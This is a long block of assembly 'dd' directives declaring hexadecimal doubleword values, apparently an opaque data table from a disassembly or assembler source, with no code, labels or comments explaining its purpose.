dd 14E72073h, 0A1BB85EAh, 6D26B015h, 0D4E25BA5h, 19C4D61Eh
dd 855E2E2Ah, 727F6769h, 4482A2A2h, 9B28553Dh, 3413D18Fh
dd 5C900420h, 1B271D45h, 0BBAD665Fh, 3B28B1EEh, 0C24542D3h
dd 614CE445h, 0FB18B4C9h, 7901739Eh, 2851FDB1h, 7546886Bh
dd 96868034h, 2C3F2D10h, 766FCC75h, 0C2E0F9A4h, 98243437h
dd 0A9395739h, 0BAA59A55h, 0DFA1EC83h, 0A21D72Ah, 0DEBB95Eh
dd 4C3D3D42h, 28822FC6h, 6DDC315Ah, 0E78B4094h, 62BF3D23h
dd 6AAF627Fh, 3A1D13A5h, 4CC8845h, 0EF8B154Fh, 922A5E3Ch
dd 0E81B67A5h, 9E80E7ECh, 0A3F3B14Fh, 33453086h, 68414A4Bh
dd 605F063Eh, 2111E195h, 72028161h, 232DCCE6h, 3A28EAD8h
dd 0D6533BF6h, 3A363592h, 3ED4508Eh, 0D482F55Bh, 0C4466A13h
dd 3C3C222Fh, 0C9861EC8h, 55C8E28Ch, 5B7BCC93h, 0C7E4D69Ch
dd 21D149E0h, 3F6300D4h, 361C780h, 78579F96h, 0A1E58669h
dd 84C3AEBh, 8309DB3Dh, 766C56D6h, 0DBA37EC6h, 0D0CF057Dh
dd 717D1A6Eh, 781C98Bh, 0B689E84Ah, 936B28BCh, 89394B48h
dd 0DB00624Fh, 5EFD40BEh, 2FF9CA88h, 1C6E214h, 50A5E112h
dd 9EE6AB49h, 34A36639h, 61A0F9C6h, 7CCA314Eh, 9D8C053Fh
dd 0ABC8F252h, 58DCD91Fh, 4345B823h, 5855CB53h, 0CCC48610h
dd 3DDBC203h, 0CE9A03DBh, 0D502BE93h, 0F12C96B6h, 787F6DD8h
dd 5B424318h, 85A495Ah, 4DB3654Dh, 1D8663B6h, 8F1BB69Bh
dd 1233B930h, 67964FFh, 0AC58E90Eh, 4DAC988Eh, 0A8A43D7Ch
dd 0B12C3E4Fh, 8C826888h, 0FC593809h, 38BA0080h, 3A98A8DFh
dd 5DF357CEh, 0D318AD50h, 1347EAEFh, 0D167C205h, 9BE2AC19h
dd 2C1A79EFh, 52A9871h, 81401398h, 5D8BCAD5h, 0EB6A74ABh
dd 8C1492E6h, 0B39A39B3h, 612014E3h, 8718C934h, 2C9AAA83h
dd 3BA1D717h, 8AF803A8h, 9F348F0Dh, 0E282E336h, 0B863A61h
dd 0FBE7378Eh, 0F56D200h, 1367D8B4h, 0B2C86BB6h, 37BB2180h
dd 0EB38F9E1h, 0AE0989CFh, 777027DAh, 0DDD506CCh, 91974BCAh
dd 0FE98D67Fh, 4686CE7Dh, 1D86E56Ch, 0BB15E03h, 0C51A51F4h
dd 0FFFC93BCh, 0C63F6986h, 0CFFDE3AEh, 42210ABEh, 8267CB6Fh
dd 0E736AB71h, 2C5D390Fh, 4B3D33BDh, 0A200953h, 847EB131h
dd 293BEE5Ah, 787A28BDh, 684B2DF8h, 0F2236838h, 0A3AA10CAh
dd 0FF656701h, 1436812Ah, 0DCE1C129h, 0F2820B45h, 0B2DE2BC3h
dd 611CB5C5h, 0C6285A94h, 16815232h, 3035550Ah, 90B9B7C0h
dd 7E4DE3B3h, 0C0326647h, 9567464h, 0E0379202h, 90CCBBE3h
dd 59B9E1A1h, 3741A7A9h, 29AB5430h, 0A361DC69h, 26CBE39Eh
dd 0D9AFECC1h, 0A1360147h, 0C6422788h, 8096D69Eh, 0DB34349Eh
dd 0DCE9953Eh, 1DBA1045h, 46C94E87h, 1AC91210h, 24F04EEBh
dd 0F2E507DBh, 69FB0BF0h, 63D02C14h, 1A9BBAC5h, 762F22Dh
dd 4F190815h, 49833ABBh, 0BA642539h, 370118C3h, 0AF6D90Bh
dd 657B7E54h, 0FC92820Eh, 0F730E88Eh, 9CF37E14h, 8727A9A4h
dd 98D3CEF5h, 13EBBAF7h, 0C17EA8F2h, 0D5EB4130h, 88268F25h
dd 0CEFEFD31h, 66FB9C1Fh, 69FA20F1h, 863192C9h, 1150DF47h
dd 0B74C586Ah, 623424D4h, 64029B4Fh, 7D439125h, 0DDB04B61h
dd 9B055ADFh, 96F1EB81h, 634EF46Ah, 0C1FC2CA4h, 0FB453EC4h
dd 858F88E2h, 209B6B60h, 948A1F6Ch, 25B3CB4h, 45A75D2Fh
dd 450770A2h, 74C36A5Eh, 49CE1DD0h, 59EE1518h, 56EBA1F2h
dd 3443722Fh, 0D8D17DB4h, 0CAE9E2A4h, 614B1B45h, 6E6D9A9Bh
dd 59B94EB9h, 60BD4FDBh, 88206017h, 6BB829Bh, 0CDBAD3A1h
dd 6730F38h, 0D83BBEEDh, 3B5D9243h, 0F59F931Ch, 0ECA048AAh
dd 47300F48h, 3F1AFDB4h, 0A1D2BE26h, 0BD50AE74h, 99606F1Eh
dd 0AF74E988h, 84EFCAC3h, 0A0E3AAA0h, 0B8E8DF96h, 0EE3503E6h
dd 2884C2D5h, 0B2176D73h, 22E0D643h, 5DB9A7B1h, 0D624C337h
dd 36950B07h, 4A653BCDh, 394AFB90h, 0D13AB92Ah, 5FEC1DBAh
dd 0F5811C1Eh, 9EE850D5h, 8E0640BEh, 8936F7A1h, 39215DFCh
dd 6F9AE8CEh, 0BAF68060h, 0F7E1898h, 97B5317Eh, 3BD817C7h
dd 9A072D19h, 0E3D0E7Fh, 384D44EFh, 0B887F1F5h, 9EBBDAF2h
dd 0CCA404DEh, 6EE1FFE0h, 47E1D7BCh, 6B537554h, 4CCB20Ah
dd 14A56C2Eh, 631A8535h, 265BFBABh, 26D9093Fh, 0E427FF88h
dd 0A1DC8A23h, 579D87D3h, 1E1A83Dh, 0D1C684C8h, 9721FD76h
dd 0ACA3119Dh, 822DD605h, 0E7DFCBFh, 0EC904208h, 8EE8D9F0h
dd 0FD70BA26h, 86DCF1A2h, 44070F1Ch, 479031Bh, 0BFA4E51Ah
dd 0DE177001h, 16733FD5h, 0B645E42Fh, 6ACC28F3h, 96FC63Fh
dd 2FA6344Ch, 3F5AF513h, 45FB6651h, 0DE1EA0DDh, 56DC2CFAh
dd 4F2E2882h, 611791E9h, 0BA8C3043h, 0C67A834h, 0DADEFD95h
dd 0BA8A22E7h, 0EF1B8C72h, 876E1189h, 5F41AD3Ah, 0AD4127FAh
dd 0E7498D00h, 0A4FDF598h, 1D9B2AD0h, 0E871C67Ch, 0E73615B2h
dd 15C4C80Fh, 71872B74h, 0C993A3B9h, 725FE9CEh, 94288871h
dd 53402323h, 1F06ED9Dh, 0AC4F22Ah, 14BF979Dh, 4545C35Ah
dd 78DADC5Bh, 0C25AFD68h, 0EA73422Bh, 96334811h, 8B66529Ch
dd 60147B18h, 0C503ED7Dh, 8A0F341Eh, 0ECA91196h, 536B3127h
dd 0C4A58467h, 6EEAB5A4h, 0B32929h, 3896296Ah, 844EB4C0h
dd 32DD4EA2h, 0F07D588Fh, 6F7D8387h, 0E845F4EBh, 0A4AD5871h
dd 97B00DABh, 0C9EF9357h, 0EF3FF410h, 3C1CCEE1h, 0E685214Ah
dd 6AFE575h, 0A3A16DF8h, 127C5A2Dh, 0AC7A053Bh, 0B0999FB6h
dd 94AEE4A3h, 6F939D0Ah, 5A9C8770h, 167AFADCh, 68701274h
dd 9056499Fh, 0A3B9897Ah, 91B34BC6h, 5AD3C09Dh, 0DE4B3D1Eh
dd 21A96158h, 0BB2BC152h, 1876D4D4h, 7FF804CCh, 6C64C32h
dd 99E81E18h, 0DD744541h, 3CB65A8Ah, 0B306405Ah, 9939E402h
dd 3290C29Eh, 0E82AA977h, 7A869A04h, 5D00E0C3h, 0F39B70F6h
dd 31437D55h, 573AE77Fh, 650C030Dh, 0BFD712E6h, 0E32EE16h
dd 0A1AFA5EBh, 0FBC4413Fh, 2C443AA1h, 0E76B0841h, 0F2860A6Dh
dd 0FF527EA0h, 0FC5E8D5Bh, 0B9E8467h, 0AB44BC18h, 0AFF8E479h
dd 969D68CAh, 0CFEF1D4Ah
dd 0F3057090h, 306E9AF3h, 2C8E1164h, 4A26AF20h, 5891210Ah
dd 694B48CAh, 58BEF8Dh, 4F66CABBh, 349DFECBh, 40953576h
dd 62417231h, 0D45EE8AFh, 8DF45220h, 0F19EE8EAh, 0B245F857h
dd 5262318Bh, 7FC95EC3h, 0B1595201h, 36F3D5E1h, 0FA646F68h
dd 3DDA54B4h, 3CAA5ADh, 4E303F11h, 683ADDA0h, 0D4B0DF44h
dd 6AE01F9Dh, 0FB57E85Bh, 76CB74F5h, 0BD9A20C1h, 6363E440h
dd 1677E489h, 0D82362A7h, 9C8A488Dh, 3EB174EAh, 0A085C74Ch
dd 0C662D67Ah, 9FA1D34Ch, 9D7F5E41h, 0D7058CA7h, 0FC006EFFh
dd 3E5A678Bh, 0FC0720C4h, 8B768B44h, 5F31C1FBh, 0E28D4EE5h
dd 38F68637h, 33983E2Ah, 9408813Fh, 0F167C509h, 0A314E5C6h
dd 0BBEBEE16h, 0B26AF857h, 0E0A5FEF3h, 0BB5249B4h, 83200994h
dd 0E620B256h, 27AFAB3h, 62BD6079h, 9C9F3160h, 0A478E1AAh
dd 0A4CC9E08h, 0F3250A64h, 0C6940112h, 0A08E7D07h, 0AE2F57F9h
dd 2EF86B60h, 9E1F9C6Eh, 5C1CF6C8h, 0A3B77C4Dh, 0C03A8CE6h
dd 0FA99723Ch, 1C410A88h, 0E51E1955h, 2C04F137h, 5C20F6A9h
dd 635B8EC4h, 0DF398CF3h, 14422403h, 5CB97A0Eh, 7968A786h
dd 88F7C279h, 1743CDD7h, 706ADEE7h, 0DAA4A7DAh, 0A7D7377Ah
dd 0D755A57Ch, 39893A1Bh, 3D5F2B3Dh, 4BCA8DB1h, 0C881935Ah
dd 0A04B6085h, 0A460329Eh, 0C0D89EA0h, 0E73739BDh, 70F9CE01h
dd 0ABEC682Ah, 2C760B11h, 9CA383F6h, 0A4D2B025h, 0A6F4A48Fh
dd 0CB07223Eh, 4FE79A49h, 8088F0B1h, 0A7D90BFh, 1986DB1h
dd 6155D2C3h, 2BB8979Ch, 205B301Ch, 1F853A91h, 0FFA6A789h
dd 270E13CCh, 2D9455BBh, 0FDCC26DCh, 339ACB7Fh, 0A705F706h
dd 331F5AB3h, 7155F987h, 0F5806AC8h, 993135EAh, 21065032h
dd 0A12F35F3h, 62596CFDh, 0CC0B1650h, 23D3AEAEh, 0BBA1AF80h
dd 89032F17h, 25CA239Bh, 0B2145164h, 0D26DE10Ah, 0EBE24452h
dd 0A28A6624h, 84B84E6Fh, 0DD607EA9h, 1E05B3F2h, 7198B3B6h
dd 7DCD8CB0h, 59AA9650h, 2B2A4918h, 1FE489DDh, 82CDD583h
dd 0A79B0109h, 0BFE91167h, 0D0073EAEh, 972AFC98h, 0B79C53B5h
dd 0C4F1C387h, 0D471162Bh, 0FBB1B568h, 2DEB566Bh, 679D2199h
dd 848F75Ch, 26276E18h, 0A5C9DFAAh, 34C9AF2Dh, 0D476CC2Fh
dd 2F0E7F09h, 691846DAh, 58E57CCBh, 4F5B4DBFh, 0A4391E92h
dd 8568F64Ch, 200AD68Ah, 29495049h, 0FC73F33Dh, 9583BA36h
dd 10A112B4h, 0E451E3A1h, 0FDF4F36Ah, 7D0AC3CAh, 0A6FC91Fh
dd 83E4DDF2h, 0BD124D8Ch, 0FB4AFE76h, 4F4354A4h, 4E5D0F32h
dd 95699202h, 934F80C9h, 1C21863Ch, 0A6014E90h, 739AE398h
dd 0E50BB8F2h, 0E0312C06h, 58C9E3A2h, 9E933359h, 22CB2DC9h
dd 7A832F7h, 0E9512A4h, 66D0931Ah, 0A3923607h, 91E2C479h
dd 0C82E8CB5h, 4F19F999h, 0D8606CBDh, 99760572h, 0B85199BCh
dd 61998173h, 42E1EB0Ah, 0AC41C855h, 761976C9h, 0E552A93Bh
dd 7980F2Eh, 0A0F287C8h, 6B960BB4h, 9D1C1C54h, 4564B3EAh
dd 699D862Dh, 0F99FEDD3h, 596EA391h, 0C60999A2h, 3B351785h
dd 0D8ABB955h, 93DED053h, 97C97F42h, 48AF9A67h, 0C89F11ADh
dd 2C80326Eh, 0BDCA2B1Dh, 1B3237B6h, 0BCFED23Eh, 0F161A8BAh
dd 0A84EDF3Eh, 0BB02F44h, 4FFDBD3Ch, 2D530136h, 7744F3F2h
dd 92CA56FEh, 30279995h, 3804A4D3h, 0B200C9F9h, 65FD369Eh
dd 0EEA46D0h, 742CAC0Ch, 0AFDB90EFh, 2B409BCBh, 0F20F446h
dd 4A478F86h, 0FFEF15C8h, 3433DAF2h, 151E759Bh, 3CBB0CCCh
dd 123F994Dh, 0EB7BAA0Fh, 0D6B49D39h, 0B6EE06FAh, 0C52E3680h
dd 0CFBCC6E6h, 0B4A73EC3h, 0A7C9D2A4h, 0D135C77Dh, 0CAC69861h
dd 0AB469CE1h, 6F950FBBh, 679C2066h, 77490D53h, 25867B10h
dd 7114C389h, 3B83DB78h, 0DC5F5BBEh, 0DCB4C22Bh, 8F55F223h
dd 10AE1C03h, 443970AEh, 0C566F4BEh, 0A1C77462h, 87790AFFh
dd 49C30FA9h, 2B4DF050h, 4611B560h, 9932D8F0h, 0ED3C8F5Ah
dd 63A62ED9h, 61D66DF3h, 2864358Ch, 0D5DDC66Bh, 6642A65Fh
dd 0F5085B2Ch, 12FF684Dh, 7AC945DFh, 0AA570181h, 52FB89B9h
dd 0AF3906FCh, 4231E6ACh, 0F5B179DBh, 77B933D2h, 0B83BA0BDh
dd 0BCCD7270h, 0FEA7C683h, 0B883DA5Ah, 0B142947Ah, 870B12D4h
dd 0DE22F75Ah, 5D79ACA1h, 83A45A8Bh, 66143833h, 0C09A11DDh
dd 0DF41E003h, 0D92FF73Ch, 1E6DF795h, 0FC407CD0h, 0FC4EA709h
dd 0FEE9081Ah, 42BD5782h, 13E63CBAh, 0B4718932h, 5A099231h
dd 6F5E2633h, 9F5EB0EAh, 72EC78A4h, 0FE46EEABh, 0F985F7F6h
dd 0C6F6EC26h, 0D5D38F02h, 0A27887E6h, 91886809h, 0FA907186h
dd 0E566D18Ch, 0B927AE2Bh, 37E51274h, 93BCA89Fh, 0BDE2FBDEh
dd 324BB31Fh, 84976F27h, 0E86CA38h, 33BACD5Ch, 62281C7Ch
dd 3F3366CBh, 63834A00h, 5F8C2A5Dh, 0E8DBCC4Ah, 0CE676EA6h
dd 0D0920861h, 197AF07h, 0A0A31500h, 5D5C8DB3h, 56ABF5F2h
dd 8C27E7E8h, 2173B39Dh, 0CF51BA8Ch, 0AAEA927Eh, 30D647AEh
dd 5BE99D0Bh, 23EEEC02h, 31C21BACh, 8784829Fh, 8D77DD45h
dd 53BEEBBCh, 72660C04h, 58D158A3h, 94A4D885h, 707790B3h
dd 0C771774Fh, 0BE24343Eh, 414C6CD0h, 0DDB834A4h, 82B2635Bh
dd 0CEE42954h, 89163EA9h, 756EBA55h, 0B363AC8Bh, 0D401E4CDh
dd 0A5AABA53h, 0C8C65492h, 72DD2086h, 0AF52CF73h, 5B7889DAh
dd 0E8438B56h, 9D6C4A93h, 0E92FAFCFh, 0F1F105h, 6CAD3AD4h
dd 35A5C9CFh, 55CBA040h, 0E1384632h, 0D17E1BD7h, 399453CCh
dd 726E64FDh, 0F9525A4h, 88317747h, 3023B50Ah, 4B5D865Bh
dd 12814A94h, 133F01ABh, 0D374E1A0h, 914AC3BFh, 0DF01FBB5h
dd 0ED11F55Ch, 97BC624Ah, 0EB4F4D2Dh, 0A342AABCh, 176AD782h
dd 87B0EAD0h, 283DD5BBh, 0D06CEADAh, 0FE34F6B8h, 0CA8D2A59h
dd 367804FAh, 0FE1092A2h, 1D01E826h, 6D41FEC1h, 4FFF3500h
dd 9898DDBh, 0E49F9CC7h, 522D8785h, 4DC16D4h, 0DD02F25Ah
dd 0D2DC9E13h, 29FED6ABh, 0FF14E3DBh, 4821CAEFh, 0BDD35B7Dh
dd 8FE81228h, 549FABE1h, 0D0A4B502h, 0B5E0470Ah, 0BD18F91Dh
dd 0B6D2748Eh, 0F77390FBh, 0C3891E4h, 5DF8D31Fh, 3E83C04Eh
dd 0F976E7BBh, 0A4628E0Ch, 4C6826E6h, 0FCBD27C1h, 0E7D4A742h
dd 1391CC4Fh, 9ED8D883h, 9660A265h, 0DC9BA68Fh, 7B53B6AFh
dd 0AAB8994Ch, 9E4B4477h, 211253BAh, 972CBA42h, 3F3CCEFCh
dd 805622A0h, 0E1D78269h, 2E5EC31Ah, 88D1611Ch, 4D47ED7Eh
dd 5B6ACA05h, 0F025AB83h, 0B91D4DFCh, 261C0818h, 12766181h
dd 5AC9D0B3h, 0CCAC10Dh, 0B80CF150h, 4B96D817h, 6F200332h
dd 241EA7D9h, 462325D7h, 0F913390h, 0F37BD638h, 3414B0D7h
dd 0F7FE347Eh, 0AD648E4Ah, 0F93F4A4Bh, 14B3DCA4h, 0AF18C921h
dd 0DF1BF038h, 30DD73C9h, 446AC67Ch, 5CD07DAFh, 52478622h
dd 0B3897200h, 85047996h, 2319F3D8h, 0CB741F26h, 0D0A81024h
dd 67194BAh, 756D1EC0h, 0C018C417h, 0CBA98CAh, 4D78EF98h
dd 0DF4A6FAFh, 3C253CA3h, 93E1DD6Bh, 58411379h, 0AB49CBD5h
dd 9BE2F05Eh, 5683D2B5h, 27AB729Ah, 94DAD10Ch, 77369252h
dd 5BAC232Eh, 47833473h, 5FAACD6Ah, 84E019CFh, 8569C7Fh
dd 4D121B4Ah, 0C146521Fh, 5F74A359h, 9078533Ah, 36A505D0h
dd 0E4FFFE92h, 9075DDBEh, 0BD477DCh, 4D7A8422h, 0C35060F4h
dd 7DC27F81h, 934F0794h, 672C6158h, 0E65F0670h, 237E724h
dd 4850FF2Ch, 0E9818Eh, 410B9FD6h, 0E0F59469h, 0B2F757C2h
dd 997769D4h, 0D157FF82h
dd 6864B89h, 0D67C41B5h, 0C3423F4Eh, 62D6C8BBh, 7C3E0FC9h
dd 2D120CEAh, 0AD498441h, 0D3CA52E7h, 46C6FD26h, 253B2208h
dd 0D3D2EC0Ah, 8E277887h, 538C3AE5h, 8D6D59A7h, 8E68656h
dd 5E7EE3B0h, 1DD8AD0Ch, 9ACEC863h, 22679292h, 0EE1E5292h
dd 8B6AB774h, 0C0DE42D6h, 0B1DEDF18h, 0FBD01E4Ch, 5D23F711h
dd 5702690Eh, 9B30627Bh, 883D8FA3h, 0B464CF6Bh, 3288808Bh
dd 255591Eh, 71575DF2h, 954DE071h, 0A09622E9h, 278CF888h
dd 8994C480h, 2BD00F50h, 27DD50C9h, 5D8F5E17h, 0D28DABDBh
dd 9C5381AFh, 0E5BB00AAh, 5DF1332Ch, 0DB7496B7h, 0B808DDFCh
dd 15AD022Bh, 210F1688h, 6418CE20h, 92AD7710h, 9714EB13h
dd 48D91869h, 6A127C25h, 8B449E8h, 9BB6E55Fh, 2CC4B957h
dd 63F8379Bh, 37820627h, 0B277AC34h, 0B1ABBAF2h, 0EDDC7225h
dd 0EF9AC18h, 0BE4B5F8h, 0C8804AD3h, 342026ACh, 1694985Bh
dd 6AC273E4h, 387F79BDh, 30BBABDDh, 42BD9982h, 0F9447054h
dd 58C14FBEh, 0F93B7E05h, 87100EE0h, 0E2BF5D52h, 0AFFA9F6Ah
dd 43C8B7D6h, 0E71A737Bh, 0F3241644h, 8EF6E06Ch, 10A1B03Eh
dd 75D28F3Ah, 39DD6A52h, 0C16156FEh, 65E8270Ah, 6D37DABDh
dd 7838A470h, 8E61BF35h, 0F8AF22E6h, 0FC77B70Dh, 6CB20295h
dd 8584D172h, 77F1F0C6h, 82BDAA16h, 895A28A6h, 81853428h
dd 0DB274644h, 0A5BDA08Ch, 89A23355h, 0DD7FA858h, 13C3DB97h
dd 4C0CEB3h, 0AA9A069Ch, 0CC3312F0h, 0E6E246F4h, 9FB3A2DDh
dd 0D97D36F4h, 5A1ADC2h, 59D0B81Ch, 0C7116F7Eh, 391860EDh
dd 0A155C5E3h, 0B5DEAD76h, 15286417h, 4F255D5Fh, 4CF1F1EAh
dd 9B584D3h, 0D922AA81h, 0A9BD100Fh, 0AD319B66h, 78B2E396h
dd 3804F735h, 0B62D0F20h, 0EA1B7EAEh, 61971C76h, 1024038h
dd 0D84A0343h, 389A64E8h, 0F18197AFh, 0ED619967h, 4FDA2ABCh
dd 97B1D259h, 755C87C6h, 834063FEh, 840E85CAh, 0DF07E5FAh
dd 0CC89DEC0h, 789FB383h, 0E87E52DDh, 2FD5631Bh, 6B292289h
dd 9985FDB0h, 4721C6ABh, 7D218F5Ah, 1A6C961Dh, 9449D2F7h
dd 3A82740Dh, 7A401D5h, 7217AF57h, 0F73F6F91h, 927A5D91h
dd 5F0AEA40h, 9484E588h, 0FD8979DDh, 43392C4Eh, 0ACEA8478h
dd 683F717Ch, 0CE88CFA5h, 1F58FE92h, 7D4E1BE6h, 0E9028B44h
dd 0E2E6A71Ch, 308C6EAh, 6F1C0F2Ah, 0A421A099h, 8133A48Ch
dd 0FC293E09h, 2A263342h, 0BA8DDAA2h, 0EBBEC1BAh, 0D98DA8B9h
dd 0B32EBDBEh, 0DFD52570h, 43A14788h, 1AEBACE5h, 0C38DEAD0h
dd 0B6925453h, 0F68B2F76h, 1302A3E8h, 2AD8A9B9h, 3FD77672h
dd 0DA5B102Ah, 0B7DDABBFh, 693B7061h, 0DFB6674h, 0DE629CE0h
dd 7589B246h, 20935C24h, 0EDCC9EEEh, 0CF587DCDh, 454CDA4Ah
dd 0FD042EBBh, 0C19E4770h, 0C607F1D5h, 2ED8D04h, 0ECF342E5h
dd 8F921573h, 0BCB883A7h, 0F13F71A7h, 42D0BBADh, 0DFAC1B6Dh
dd 0DBE72E9Eh, 94056C13h, 0C1F16330h, 846DBE02h, 702A21E7h
dd 0DE33E2D5h, 0D92444CCh, 46C2A4E7h, 0B150A0C1h, 11FA90Eh
dd 0C53C00B8h, 0FAF79974h, 481D4009h, 54879A92h, 5EEE2BD4h
dd 6612D7EAh, 0BCCC3FDDh, 0E2A65D08h, 21424312h, 5A35F756h
dd 6FE1F0Ch, 839C8FC8h, 0FFB557ACh, 7B16DF4Eh, 96718BEFh
dd 0F3A21A1Eh, 2FA22A58h, 48814261h, 79B06EB0h, 0ED2B22DFh
dd 60E29EAFh, 8A34AB81h, 8F8B7803h, 8C8FF1Eh, 0A864FC41h
dd 0A9774650h, 0FB831F5Dh, 0F23F9770h, 9B9D1933h, 89D10110h
dd 0A42D382Bh, 0F6DF021h, 0FE783F20h, 0CB0A37F5h, 0F1BF046Ch
dd 0AB5D002Eh, 601BBCDCh, 0F8C43144h, 3E697B52h, 558EC09Fh
dd 755444BDh, 0E4032322h, 8B741EE5h, 1D59B537h, 0D21D2ECAh
dd 6FE211E3h, 0E0D0E251h, 6BBC9A81h, 5C2FFBBh, 4B76FF05h
dd 0E1F3229Fh, 5D2D9B7Ah, 0CB161E13h, 0C874D79Bh, 8164612Bh
dd 2BFF8890h, 19B24561h, 0C0AAAEADh, 459BC581h, 0C909AACAh
dd 2E3BAEC3h, 2112B1F6h, 56D7E4DEh, 2589140Ah, 7A65F13Ah
dd 0A258A70Fh, 715C52BEh, 6EB95965h, 4B6085B2h, 48553BCDh
dd 214FF8D4h, 108936CDh, 8167F5F2h, 71999B05h, 6465B5A4h
dd 8A331B60h, 5676CD02h, 1479DAD0h, 0D253E8B4h, 0B14377C8h
dd 87323FA9h, 3CAE382h, 9B4C745Ah, 416D1A5h, 7E4A529Ch
dd 4B6B75CDh, 0FF8A24C2h, 1320888h, 0D01A0EF8h, 0AAD73B93h
dd 0D8B42E14h, 9076EEC5h, 0B2F373DCh, 82C590F4h, 0C57F9FBCh
dd 4F46CA5Fh, 3A33C02Fh, 7747B363h, 0A51D1A82h, 0BFA2510Eh
dd 5436F533h, 57D8AE99h, 2D10478Bh, 3128AE88h, 642B521Fh
dd 5F9A5FBBh, 29398798h, 4442206Eh, 0B0B08601h, 175A05A9h
dd 54F41A86h, 4FFF9B86h, 0D1C49AD4h, 0D845FDB5h, 190F0C05h
dd 0EB4E1C35h, 2C74DDDCh, 68E31BDAh, 0E7A8B51Fh, 63DDB9C2h
dd 0C8F3CCC4h, 0E18026DFh, 0D56A56F0h, 0AA648210h, 0E10DE575h
dd 8AFEF53Ah, 427B625Bh, 4CF1C9Ah, 9F49237Dh, 4226E800h
dd 35F6A201h, 2C78A9B2h, 0C33865B3h, 11FBC916h, 0F377C735h
dd 7925F112h, 36A73A1h, 0AC3B3660h, 0AC768BBDh, 6223077Fh
dd 42E7829Bh, 0C2D36BE6h, 0DC0566E6h, 98AFD57h, 0FA48299Ch
dd 7ED2E3E6h, 0FCC49FACh, 0F2B20493h, 5AD67F2Dh, 30ED801Ch
dd 0ABF1A90h, 0D931FD84h, 0AA5E1899h, 962FC25h, 4129E625h
dd 1C5F42F3h, 210F9176h, 7FB5BBD7h, 8F648B9Ah, 0EAC037E0h
dd 0C33838BAh, 308D242Ch, 95C85F19h, 1DCF6C43h, 576E04DFh
dd 6CD05FBEh, 0CEAB5344h, 3B956A4Bh, 95E9084Fh, 6163CF51h
dd 7C93F505h, 6650B1ACh, 98634D3Ch, 0E3FB9FA2h, 4FC75DA6h
dd 0B9AB51ACh, 0AB20C566h, 0C846AE5Dh, 6C74CF47h, 2992AE42h
dd 0CED7FB4h, 9384F975h, 22BA1E02h, 0D41B067h, 884A1A53h
dd 3466E153h, 6EB99FE5h, 1C5D5A2Ah, 0B8E65D63h, 0BBADACB1h
dd 9B753048h, 0CB9402A3h, 0F0AA94C7h, 0D1C43016h, 6EF555C7h
dd 0D99FB891h, 8554396Ah, 0CD954D61h, 6C423D78h, 14D20968h
dd 0FE07371Ah, 42F383B4h, 0B6123CFh, 0DB42DAECh, 62DAED3Bh
dd 4613793h, 0C960F8C1h, 0E99F1C9Bh, 93F98E0Eh, 53680A48h
dd 6C6D4338h, 921DE682h, 7D9005E0h, 0C7E79C26h, 0DEC17Ah
dd 0F0E47844h, 25BCE218h, 8A1845DAh, 0F5F51710h, 1674DFF6h
dd 494B70A0h, 738A8CD7h, 76822FB6h, 0E8BC476Bh, 1C95953h
dd 9B0D170Fh, 0DB06C203h, 0A5135DCAh, 618CDE45h, 0DD81D825h
dd 0D143BAE9h, 0DF31BE6Ah, 10C743E4h, 3A7A9F2Fh, 0BE9F71F6h
dd 0DD48FA54h, 2F643A9Bh, 0D42FD2C1h, 70703B9Ch, 8EA3C08Ch
dd 72ED112h, 2EC687A2h, 0F567493Fh, 0BF54528Fh, 4E1649ABh
dd 486FF748h, 78A1D403h, 6F99450Dh, 0B5F8603Fh, 7345B27h
dd 524DE0BEh, 3F1D923Eh, 78B18C23h, 9C3B91F9h, 1E4E99D2h
dd 79446282h, 71FC7B5Fh, 229ABB46h, 0F91F045Ah, 0B5B51C8Fh
dd 457CF878h, 9EEB473Ah, 0EBCC6377h, 0B78E27DDh, 0FCED0DB8h
dd 0A99D88DDh, 870C3A30h, 153E7B3Bh, 30CE2A7Ch, 441EAD9Eh
dd 0A7426FC4h, 0E034F655h, 38830135h, 0F4C57B22h, 0F23D1B57h
dd 0F5151C89h, 0B03A7FC2h, 9DF8AB62h, 0CAC103AFh, 0FF1A5E7Ch
dd 273246AFh, 76B0CD16h, 0D0C79408h, 44A0E2FEh, 0CCE84422h
dd 86172660h, 75166A08h, 78D9D753h, 3E55103Bh, 0E86D9C93h
dd 0BEBC6ED2h, 0F3CA3891h, 3EDC124Bh, 9E1EF5EBh, 9448ADC1h
dd 0ED90FCBEh, 6F87C811h, 33BE8FBAh, 9619215Bh, 0C71F6879h
dd 130ED614h, 0AD9C7813h
dd 4B46C12Ch, 71278DB9h, 99A95097h, 8705A53Fh, 9A96AFD3h
dd 0FA06C0A1h, 0D7B550E0h, 0D8488BBCh, 85119956h, 0DA660F5Fh
dd 0C4006A14h, 4847E499h, 0E4A669D7h, 0B3B76F5Eh, 0AC098DE3h
dd 362C79C4h, 35AEB1BBh, 2E8AAD36h, 0FF0FD18Eh, 94D0B601h
dd 0CFFDCF2Fh, 0B92F458Bh, 0F7B3B7C0h, 146E7D72h, 32CC10Dh
dd 9F4E0C5Bh, 9D98368Bh, 0AD97E3C0h, 0AF9ACDB9h, 8FE736ACh
dd 38CA5970h, 0DF495DD1h, 5F8805F9h, 0F746E0DBh, 6A764173h
dd 4C3294F3h, 595490A2h, 7C4A9FABh, 17E40139h, 0C7A26558h
dd 3B8C0363h, 2ED49CE5h, 0A36367E6h, 1E4C8ABBh, 0A3D92A33h
dd 7FE5C130h, 9A7215CFh, 0CD5D493Eh, 0DF2EFD96h, 7875C6CFh
dd 0D53678Dh, 86F7C6A3h, 8D357571h, 0AA40321Ah, 5D855EC9h
dd 8BC37024h, 46E82C82h, 20F9DAFCh, 0CF2A319h, 51B0570Fh
dd 6F5844E0h, 0A4D3E118h, 8E37BC97h, 0E57F0286h, 5217BAD8h
dd 428A914Bh, 9C29BB6Ah, 0C8B98874h, 0C66A878Bh, 79A87124h
dd 0E6698F85h, 0E543EBDAh, 0D1C140Bh, 2AEF3C0Ah, 1E8C2A20h
dd 750AA1EEh, 0B25F95C9h, 0FCDDBE4Ah, 0A784E30h, 0B32F83Ch
dd 80129F36h, 0BF45B6B5h, 0CCC752D5h, 5C826EA5h, 8B1C1B87h
dd 0A7B216DFh, 0E08B9F2Dh, 283C8B66h, 2B9E8942h, 66F4FDB2h
dd 5ACE0F59h, 0A52B92B2h, 0C2DB7077h, 0CB833544h, 8885A117h
dd 83998DF9h, 397326DDh, 95600A32h, 716357BAh, 7F7D6CC0h
dd 53C04238h, 0D6E27480h, 3DECB7E5h, 4F87AF41h, 98508CF4h
dd 54F6F1Bh, 93822BDCh, 8D8C9BDCh, 0A5B4A793h, 6A5D6CD6h
